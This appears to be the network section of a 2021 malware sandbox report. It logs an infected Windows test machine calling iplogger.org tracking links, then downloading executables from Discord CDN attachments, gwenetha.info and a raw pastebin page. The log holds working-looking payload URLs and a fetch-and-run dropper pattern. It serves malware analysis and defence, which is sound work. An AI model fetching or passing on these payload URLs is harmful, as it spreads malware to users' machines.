Network Analysis

GET /1xPHh7 HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Apr 2021 04:21:18 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=43jhm26i7cvvbmekc0t994tig1; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451713; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /2CQAB5.exe HTTP/1.1 Host: iplogger.org

HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 05 Apr 2021 04:21:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ntrietnplolbn63cfi8er9spl1; path=/; HttpOnly Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451712; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /attachments/826198252025675816/826537386485612574/china.png HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:21:19 GMT Content-Type: image/png Content-Length: 7680 Connection: keep-alive Set-Cookie: __cfduid=df321f498f10b91584304ea0d7694a6c31617596479; expires=Wed, 05-May-21 04:21:19 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63affd2ee92ea249-ICN Accept-Ranges: bytes Age: 451491 Cache-Control: public, max-age=31536000 ETag: "6be41709f8bfbf06307cc56d04249801" Expires: Tue, 05 Apr 2022 04:21:19 GMT Last-Modified: Tue, 30 Mar 2021 19:24:29 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941dc914e0000a249e5308000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1617132269285743 x-goog-hash: crc32c=aF03UA== x-goog-hash: md5=a+QXCfi/vwYwfMVtBCSYAQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7680 X-GUploader-UploadID: ABg5-UxiLDAZpR0Y2Z-4q6HmHSbdJu2Aw-itbIW-AA7MULcbcKMNQuhX9Jwm3JIVWTkUW9lL6Zi8VfeBlfDJSccdNIEhbl2dsA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=33FgSxMT2IFWZUZhoB%2BGfvr2%2BjN2bP4efX7%2F1rjkzHBJHPIgFoAlHnfB1MXqS7FE3ZC%2B2zp1n9291bSgPfajxOAfCJO6Rfb5tsbJRbigFHTp6JI%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1 Referer: Microsoft Windows 7 Professional KN User-Agent: test22@TEST22-PC Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Mon, 05 Apr 2021 04:21:21 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=dc3c8df79e420aef37d62925d70899c9c1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63affd381f3fa249-ICN Cache-Control: private, max-age=0 Expires: Mon, 05 Apr 2021 04:21:21 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941dc97130000a249fe01c000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kPTE86Ip9%2Fqqnby%2BB4uN9mkz9%2BnNkf4JrzXQW0QUuHLJYGIp9SJLC%2BZx3IibTQIR8FKoluoYGktnlyI4vgXfz59yr4bSEZGY8P1r94RTfIOdTl0%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1 Referer: Microsoft Windows 7 Professional KN User-Agent: test22@TEST22-PC Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Mon, 05 Apr 2021 04:21:21 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d605fe05df2ecdf414f26d19a60dcc44f1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63affd382b130284-ICN Age: 7171 Cache-Control: private, max-age=0 Expires: Mon, 05 Apr 2021 02:21:50 GMT Vary: Accept-Encoding CF-Cache-Status: UPDATING Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941dc971c00000284fb9be000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UxM9mW_5v2OmOFnTtca1jtfaQztMhoN1oeSnXshGvUQXdEDs3QBo0qx4CYCaKa3chT0L5y__oICpZif_IlFJRuintX-lg X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LuvZMBMsA2lF78o%2Fk%2BqKDEHHfPAb2JLCqhaw8315P8p7y0qoocewURVylxU0N3TLjoBg2VSotnOMpilFHk7PkH9Mmj8nHWrJ0bIT6e%2FaBfbphMM%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1 Referer: Microsoft Windows 7 Professional KN User-Agent: test22@TEST22-PC Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Mon, 05 Apr 2021 04:21:21 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d9b3432133bd538be67e0754393f9c73a1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63affd39aeec00d3-ICN Age: 0 Cache-Control: private, max-age=0 Expires: Mon, 05 Apr 2021 04:21:21 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941dc9805000000d331bb4000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tRQpwoZvcsyC9ZNnf1NZgAZ7ViuGr9zdwCTMWKu9GBquOmBWFoUtfyNG2LOHjmIZ5WJq2tltUEDIEEpF9sYGDGSmxTC9vLbEankcF3JAVaMgGyc%3D"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

POST /service/update2?cup2key=10:2761306227&cup2hreq=71b51d9ea15a088b2af84ffd33921119eb65dcd4b9b4898e9e4276f19445345c HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Google Update/1.3.36.32;winhttp;cup-ecdsa X-Old-UID: cnt=0 X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96} X-Goog-Update-Updater: Omaha-1.3.36.32 X-Goog-Update-Interactivity: bg X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Content-Length: 1202 Host: update.googleapis.com

HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-94amkTHoOMZd/xDWOmHFYw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 05 Apr 2021 04:21:26 GMT X-Cup-Server-Proof: 3046022100bed6a492ec0d3e8b0f5729b7df31af546628950edf766d3559eb3f6817a8f618022100ac033164216b0f31803fd97ed8d8569c92119705ff08b5b4b937df5f2e33deab:71b51d9ea15a088b2af84ffd33921119eb65dcd4b9b4898e9e4276f19445345c Content-Type: text/xml; charset=UTF-8 X-Daynum: 5207 X-Daystart: 76886 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /1iPtu7 HTTP/1.1 Host: iplogger.org

HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Apr 2021 04:21:34 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=rtundue2ffdimmsir5ma1gkr95; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451697; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /raw/gCyjHCCH HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:21:35 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=db2e1ac02aa562fecf2898246bdf21d0a1617596494; expires=Wed, 05-May-21 04:21:34 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED cf-request-id: 0941dccb1100000284b50dd000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 63affd8b4c440284-ICN

GET /setup-KGQJ-1.exe HTTP/1.1 Host: gwenetha.info Connection: Keep-Alive

HTTP/1.1 404 Not Found Date: Mon, 05 Apr 2021 04:21:54 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 19 Connection: keep-alive Set-Cookie: __cfduid=d98100dc0ab336fb64ff161b55ce378ea1617596514; expires=Wed, 05-May-21 04:21:54 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: 0941dd1903000042a505992000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qYHryEbfgaYUGEGRg8sj9CFBSzikuMNvu5JZQA%2BTQm5yDlOUSzgogB%2FC6%2FoTNTuNMbbcPAlx31bcASu%2BESXZnT8U%2BIqkMcH09ZeB%2B%2B%2FM"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63affe0808d342a5-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Mon, 05 Apr 2021 04:21:55 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d87e2ef5ef19e827792e71fcbe375f3cf1617596514; expires=Wed, 05-May-21 04:21:54 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63affe0a7c54fffc-ICN Cache-Control: private, max-age=0 Expires: Mon, 05 Apr 2021 04:21:55 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941dd1a890000fffc110dc000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-Uy0DBZJ4PhYaAXNgHdhHtQPXr-fMEjb214k4lBMCsgfAwX3FQoZ4J4-MeRNNmimijjA9VnigLiWft_v8_ovP2E X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FRfyt0n3tOb0mk2J8eCZ%2BWV%2BJzinVQ4UvTdlCThyCFfoPkgMNIwlB72Md0u%2FT8JxAP97AaENnEKDhMoTi75dDmYAqoMuDiCRVByCflAluvpbtB4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d320e0145b20ed5d1a0a88c97cc1813d51617596515; expires=Wed, 05-May-21 04:21:55 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 0941dd1bcf000012dabb1c8000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UbFb0mITie5hYGkPtvh3nKYN8rnO1FvilBp6P5xixtEDzPn5dSduwLc6O%2BmM8qTxP2Qp4ZdbhEZD%2B9eqr%2FyaSa%2FRzFZAhD0Eo6C3AQxKKXGUQ1w%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63affe0c78cc12da-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Mon, 05 Apr 2021 04:21:55 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d320e0145b20ed5d1a0a88c97cc1813d51617596515; expires=Wed, 05-May-21 04:21:55 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63affe0dec9912da-ICN Cache-Control: private, max-age=0 Expires: Mon, 05 Apr 2021 04:21:55 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941dd1cb2000012da0339f000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UyFfb0ju1UrZ8d3NVFfJE2mzlIJ6zA-jrpBc5Sed9FaHeB6-X5SNWuiJVWee-3nAVZmMLnfGcMql2KTa7C362jNEp-T7Q X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HK638qjqB99kW%2BHTxiZpy8yk%2F9GU%2BxaspigLQWY%2Bbt8gXKepZruRZ3%2Fkr5zHlFx7pYRb2QZsrgRbq%2FjMn9T7F5Zluar0DNxutekfiqVkfyfFeM0%3D"}]} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /2LehR6.exe HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 05 Apr 2021 04:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=j6tlsqgbaajed1u0bngnctd8k6; path=/; HttpOnly Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451674; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:22:22 GMT Content-Type: application/x-msdos-program Content-Length: 505856 Connection: keep-alive Set-Cookie: __cfduid=d4cd09ae93be6016b15fa13e074f315eb1617596542; expires=Wed, 05-May-21 04:22:22 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63affeb8cc98a273-ICN Accept-Ranges: bytes Age: 451551 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe ETag: "28345a7bb63babaf99e760965ce493b7" Expires: Tue, 05 Apr 2022 04:22:22 GMT Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941dd87810000a27380943000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1617132901889175 x-goog-hash: crc32c=Ws/4nQ== x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 505856 X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yVAcKIctmJ60MyU6AzKNqQe%2BJjYSr1rvrQ5Y2JS343sR5hHoXHWgLryOzMVPPAFJ67JHNoJjQbY6BAdqKzq46ISEFhfqWDqyBpl3QmIXpFY3cZg%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 403 Forbidden Date: Mon, 05 Apr 2021 04:22:27 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=de8b89d5a96e34cc6f6bf3bc90aa7c9f41617596546; expires=Wed, 05-May-21 04:22:26 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63affed25f64a1dd-ICN Cache-Control: private, max-age=0 Expires: Mon, 05 Apr 2021 04:22:27 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941dd97750000a1dd488eb000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-Uz26yCKX_mnm6Nq82REhI6Fx_B21T6sSzasO3o7WjHseapUVbZdAIUTBzRlptQQvF8aBJBvqa2sWRPCuaJyXZft1yNPFg X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6s1K0OyvzKz6qjb9YED7rEn6MZVTgMUu3Nt%2B2W6lD6a7mXiqWD8oq%2BzBw9RMmhnNO9wj7cAedB8PBtZ9m0pjEjmhrv63GaRBu1t1Jw8oxRCOxKg%3D"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:22:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dbdb52ef6254f6582d01f67c601d9c2921617596546; expires=Wed, 05-May-21 04:22:26 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 0941dd979c0000a273733c6000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zvstFQiumAZrLs9lRPZdwtyFJ%2BRSjC86J9FImex0GZa7Rc9xfBhaHtklhgGSsvIoH0d0IDCtyHKf2WWa2x7Klp7S4yboe4aWNyzKWrD%2Fs7Z1NkY%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63affed29943a273-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

POST /service/update2 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Google Update/1.3.36.32;winhttp X-Old-UID: cnt=0 X-Goog-Update-Updater: Omaha-1.3.36.32 X-Goog-Update-Interactivity: bg X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Content-Length: 1598 Host: update.googleapis.com

HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-M7tlWubnM0ZS7qNNujCMKQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 05 Apr 2021 04:22:39 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5207 X-Daystart: 76959 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

POST /service/update2 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Google Update/1.3.36.72;winhttp X-Old-UID: cnt=0 X-Goog-Update-Updater: Omaha-1.3.36.72 X-Goog-Update-Interactivity: bg X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Content-Length: 785 Host: update.googleapis.com

HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-Lj5ORRH/+PCHe7uGKAJ+QA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 05 Apr 2021 04:22:47 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5207 X-Daystart: 76967 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET / HTTP/1.1 Host: 203.159.80.228 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:21:19 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.2 Last-Modified: Tue, 30 Mar 2021 16:04:04 GMT ETag: "1f-5bec325bb5626" Accept-Ranges: bytes Content-Length: 31 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html

HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 200 OK accept-ranges: bytes content-disposition: attachment content-length: 1304160 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3117 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=0-4813 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 4814 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 05 Apr 2021 03:29:32 GMT age: 3142 content-range: bytes 0-4813/1304160 cache-control: public,max-age=3600

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=4814-18412 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

